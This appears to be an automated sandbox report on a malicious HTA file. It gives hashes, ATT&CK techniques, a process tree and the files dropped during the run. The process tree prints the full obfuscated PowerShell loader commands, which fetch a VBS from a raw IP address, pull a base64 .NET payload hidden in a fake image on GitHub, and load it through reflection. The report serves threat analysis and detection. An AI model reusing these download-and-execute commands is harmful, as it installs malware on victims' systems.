008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-10-2024 14:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicetokissthebestthingsiwantotgetmebackwith.hta
Size

130KB
MD5

b581033fd1ba02c7724802d3ccda9b5b
SHA1

ad4484b11cfd436200542cc8e4fbaebcb7491bf8
SHA256

008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4
SHA512

12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47
SSDEEP

192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	3056	pOWERSHELl.EXE
6	1728	powershell.exe
7	1728	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1692	powershell.exe
1728	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3056	pOWERSHELl.EXE
2548	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWERSHELl.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3056	pOWERSHELl.EXE
2548	powershell.exe
3056	pOWERSHELl.EXE
3056	pOWERSHELl.EXE
1692	powershell.exe
1728	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	pOWERSHELl.EXE
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 3056	1620	mshta.exe	30
PID 1620 wrote to memory of 3056	1620	mshta.exe	30
PID 1620 wrote to memory of 3056	1620	mshta.exe	30
PID 1620 wrote to memory of 3056	1620	mshta.exe	30
PID 3056 wrote to memory of 2548	3056	pOWERSHELl.EXE	32
PID 3056 wrote to memory of 2548	3056	pOWERSHELl.EXE	32
PID 3056 wrote to memory of 2548	3056	pOWERSHELl.EXE	32
PID 3056 wrote to memory of 2548	3056	pOWERSHELl.EXE	32
PID 3056 wrote to memory of 2744	3056	pOWERSHELl.EXE	33
PID 3056 wrote to memory of 2744	3056	pOWERSHELl.EXE	33
PID 3056 wrote to memory of 2744	3056	pOWERSHELl.EXE	33
PID 3056 wrote to memory of 2744	3056	pOWERSHELl.EXE	33
PID 2744 wrote to memory of 2864	2744	csc.exe	34
PID 2744 wrote to memory of 2864	2744	csc.exe	34
PID 2744 wrote to memory of 2864	2744	csc.exe	34
PID 2744 wrote to memory of 2864	2744	csc.exe	34
PID 3056 wrote to memory of 2228	3056	pOWERSHELl.EXE	37
PID 3056 wrote to memory of 2228	3056	pOWERSHELl.EXE	37
PID 3056 wrote to memory of 2228	3056	pOWERSHELl.EXE	37
PID 3056 wrote to memory of 2228	3056	pOWERSHELl.EXE	37
PID 2228 wrote to memory of 1692	2228	WScript.exe	38
PID 2228 wrote to memory of 1692	2228	WScript.exe	38
PID 2228 wrote to memory of 1692	2228	WScript.exe	38
PID 2228 wrote to memory of 1692	2228	WScript.exe	38
PID 1692 wrote to memory of 1728	1692	powershell.exe	40
PID 1692 wrote to memory of 1728	1692	powershell.exe	40
PID 1692 wrote to memory of 1728	1692	powershell.exe	40
PID 1692 wrote to memory of 1728	1692	powershell.exe	40

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicetokissthebestthingsiwantotgetmebackwith.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\SysWOW64\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE
  "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzcnz1aw.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF98.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBF97.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2864
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBF98.tmp

Filesize
1KB

MD5
7fedd71635096c29d752069ddef834bf

SHA1
76cbb5b7544a1442e12998e0c1172b28eebfb944

SHA256
218a69a9eb9d597ef05ba48e31a0d956ed930180298ce6679c38828abc0b9ce6

SHA512
0cfd97ab1dc152fd0ef6912ef17c1a0e5c619815be619fe559d0bcf1e0e438b8f79293776e745bfbe4bae38a75153794e13da09d5ef0acd3a3e3516e2b504b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\uzcnz1aw.dll

Filesize
3KB

MD5
4acc9940a8a9e1b1e35ad716d8b39694

SHA1
2e535cebcc34f95e1116ff5fe05aa86422fa2b87

SHA256
5c8724f2af1ce7e064123b438c844e32efe504c12139083be4d191cd06f0f547

SHA512
1ab33b0b3c578e5497a5c594a96649b8b97a86b0c44d4b784a568ef0f254c1bd35e0f282af8b91ab4a37b80c62526c9046dcfbfa0c8b95d591d13859db8571f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\uzcnz1aw.pdb

Filesize
7KB

MD5
ea4d2e3791d9d5cd49ae63f13fd61b6e

SHA1
f0ab77a0d131022b69bbb5acac5ab4fd1106d7e6

SHA256
496a5128c878c00a46255e255ebc4e13573c1bb76486f6d871f838cb6c0c83da

SHA512
d870f00adea356fd99af207cf8d7b342bddcb39a56da4a00257584cab8ac82af752508aae8275eb93e7c4ba8bdc36fb3aed714107301de6cb84ae35de37ca55a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d9eeae59857b14830986f2f02ca6e2b9

SHA1
6a43111415699a554d809df27bbf0c25a9741cb9

SHA256
fa81aeddb447b7ad4430d8d5fd81c88f27d69297fbfe732233ba427906f00616

SHA512
8aa79ed25b1d99285e4327a8a20ea44750b90a90079b92c80d7d93ca740c71b1d5aab49f5a7613ad636d82816e8627c8dd7a4b573e717b64e4f5c1e4ad08e693

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS

Filesize
191KB

MD5
9a8ffc29c5835f0dae8ea49bfb6bf29d

SHA1
1785396f191852732bc80ab9819d03905bd9f971

SHA256
dd3a11a501e3394e12d7fd48ee9a58fa2aa477b059f9da5b4ff20d9c9ea84686

SHA512
8562ae76f5c2d41a64c01e99006e55e45a51f525b7e390b0563a5ecc48df8334b0a8b205395c93ef9c811f5ca8a04a114ae2c58eaac30fc2eaa150712096e168

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBF97.tmp

Filesize
652B

MD5
fd414683b122b4f7376c49fa1cd88951

SHA1
550529b773e53aba0327e2b466589939763a6b7a

SHA256
d6981d1b10a6b7b1260078113f9d6b9c53177edc67995b71853834777c7bf908

SHA512
da8fc99f6c758f2827399beffdcc73f39abb1db964192afe0bdab23857c4ec0a15c017c2e2557227cd52bb42a73a36f868d50d030bcebdfbd6ce6a38dbdf4e42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uzcnz1aw.0.cs

Filesize
488B

MD5
3e2e82da91a6fab92b6b84593ff397e0

SHA1
0bbd006424668476775d6428f709ca2d1ee7f213

SHA256
2bb84c7913d6a90ebd0d9f5ceab30df4c4829c02c8eefd427b23a82772b0d8c6

SHA512
81dede5d323b38c021f3753c9372c331d9f45d3da85da125ee805365b28d340d4a67e40a31d8ed6e545e0bae86c87ba801a422831c63e78fe1febeb818983a36

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uzcnz1aw.cmdline

Filesize
309B

MD5
9ac3cc5330718e120ec6153d4f85654c

SHA1
94965415f7bf48eb1b71a4d6b1e5742851edc011

SHA256
b910a023a93a8d483e41b81d6c59ef3f598d80941efb65df5bd7c8c900103a03

SHA512
60fd6b59311a3dee84086ac257abdbb024a005f5635342f8d97cb92298f49883a94be7c6f4fa07237fa9470cdb50013b51211dae05654075d31ca78bb2ba8a9b

Download Submit